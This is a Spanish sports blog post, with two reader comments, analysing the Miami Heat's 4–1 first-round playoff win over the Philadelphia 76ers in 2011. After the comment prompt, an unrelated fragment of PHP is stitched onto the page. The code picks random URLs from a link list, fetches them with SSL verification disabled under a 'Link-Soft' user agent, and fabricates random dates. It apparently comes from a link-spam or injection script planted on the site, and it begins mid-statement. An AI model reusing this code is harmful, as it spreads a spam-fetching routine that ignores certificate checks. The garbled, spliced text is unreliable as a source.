Primera ronda del Este: Heat 4 – Sixers 1

28 de April de 2011 por TheDeerHunter

Los Heat llegan lanzados a la hora de la verdad. Por delante tienen la madre de todas las batallas en el Este, el blanco o negro, triunfo o fracaso. No habrá término medio en este caso… Pero ya habrá tiempo de hablar de lo que les espera.

Solvente victoria frente unos Sixers a priori razonablemente peligrosos con una gran imagen de solidez en la regular. El equipo de Doug Collins ha sido una sombra de si mismos y eso, sin duda, ha sido mérito de los Heat. Si quedaban dudas acerca de su adaptación al modo playoffs esta serie debería disiparlas. Se han sentido como peces en el agua bajando su propio ritmo mientras que sus rivales se han mostrado impotentes contra la defensa impuesta, de las mejores de la liga y más ahora. El equipo de Spoelstra ha bajado 8 puntos sus guarismos ofensivos pero es que han provocado una caída de casi 13 puntos en sus rivales. Tremendo.

La noche les ha caído encima a unos Sixers excesivamente bisoños. Exceptuando a Elton Brand y a Jrue Holiday, el resto ha sucumbido en mayor o menor medida a la presión de postemporada. Hawes y Meeks sobretodo, pero también Iguodala, Louis Williams y Thaddeus han realizado actuaciones desastrosas. Este tipo de cosas es lo que diferencia a los niños de los hombres, a los grandes jugadores de los simplemente buenos. Por desgracia esto parece dar la razón al modelo excesivo/estelar de los Heat frente al mesurado/caval de los Sixers. Esperemos que esto simplemente sea una impresión circunstancial y oportunista.

PREMIOS

MVP: Gran serie del Big Three de Miami. LeBron James, 24.2 puntos, 10.6 rebotes y 6.2 asistencias; Dwyane Wade, 22.2, 8.4 rebotes, 5.2 asistencias, 1.4 robos y 2 tapones por partido; Chris Bosh, 19.8, 9 rebotes, 1 robo y 1.2 tapones. La verdadera fuerza de Miami reside en este tridente indisoluble.

Rookie: No podemos dejar pasar la oportunidad de destacar a Evan Turner. Antes mencionábamos que mejorar en playoffs suele ser indicativo de grandeza y él lo ha hecho. Por desgracia el listón lo tenía demasiado asequible tras su regular. ¿Se trata de un rayo de esperanza para la franquicia?

Sorpresa: Joel Anthony ha sido a todos los efectos el center titular de su equipo. Se ha ganado sus 30 minutos por partido como sabe hacerlo: Trabajo oscuro, pelea, rebotes y tapones. No se trata de un fino estilista pero es un contrapunto perfecto para una plantilla de estrellas. Su valor no reside en los números pero puede intuirse por cómo lo han pasado contra él sus rivales.

Decepción: La suerte de los Sixers ha estado ligada toda la temporada al colectivo. Equipo cuando ganan… y equipo cuando decepcionan. Esta serie les ha pillado verdes.

Mayor esfuerzo en vano: Tras haber sido dado por acabado la temporada pasada, el otrora Mr. 20-10 cierra una temporada sobresaliente. Ahora es un 16-9… pero es suficiente para haber sido uno de los mejores interiores de la liga este año.

Comenta

2 comentarios a esta entrada

  1. portu dice:
    #1

    Gran análisis, Deer, creo q lo clavas. Aparte de la diferencia entre buenos jugadores y grandes jugadores, creo q a los Sixers no les convenía un equipo todavía más físico q ellos en el juego exterior y encima sin poder hacerles pupa por dentro ya q Brand-Hawes no dan demasiado miedo por la pintura. Ya comentaba Nocioni en su blog de ESPN q los Heat se les daban especialmente mal, lo decía antes de un partido de Regular Season y creo q sin saber q les tocarían en playoffs, hablaba de lo mucho q les costaba parar a Lebron y Wade y además q competían con ellos perfectamente en el juego rápido y físico. De la serie creo q sale tocado Iguodala, supongo q ya nadie apostará por él como 1er espada de un equipo contendiente, no es q lo fuera ahora, pero su salario dice lo contrario.

      Citar

  2. Jabho dice:
    #2

    Los Sixers hubieran puesto en muchos problemas a Celtics por ejemplo. Los Heat bien, defienden muy bien y en ataque simplifican el asunto, aunque creo que con Anthony e Ilgauskas por dentro lo van a pasar mal de ahora en adelante

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>